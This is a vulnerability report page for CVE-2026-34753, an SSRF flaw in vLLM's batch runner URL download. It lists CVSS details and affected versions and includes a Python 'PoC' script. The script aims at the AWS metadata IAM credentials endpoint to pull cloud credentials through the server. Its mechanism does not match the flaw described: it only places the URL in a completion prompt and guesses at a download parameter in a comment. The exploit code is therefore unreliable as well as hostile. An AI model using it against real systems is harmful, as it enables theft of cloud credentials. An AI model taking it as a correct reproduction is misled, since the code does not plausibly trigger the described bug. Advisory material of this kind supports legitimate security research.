Security Vulnerability Report
CVE-2026-34753 CVSS 5.4 MEDIUM

Published: 2026-04-06 16:16:36
Last Modified: 2026-04-20 18:31:57

Description

vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions. This can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM >= 0.16.0
vLLM < 0.19.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target vLLM server endpoint
url = "http://vllm-server:8000/v1/completions"

# Malicious URL targeting internal metadata service (e.g., AWS IMDS)
internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Construct the malicious JSON payload
# This payload injects the SSRF URL into the batch input
payload = {
    "model": "vllm-model",
    "prompt": "Read the content from: " + internal_target,
    "max_tokens": 50
}

# Example if the vulnerability is triggered via a specific download parameter
# payload = {
#     "download_url": internal_target
# }

try:
    # Send the request to trigger the SSRF
    response = requests.post(url, json=payload)
    if response.status_code == 200:
        print("[+] Potential SSRF triggered successfully.")
        print("[+] Server Response:")
        print(response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr (Patch, Vendor Advisory)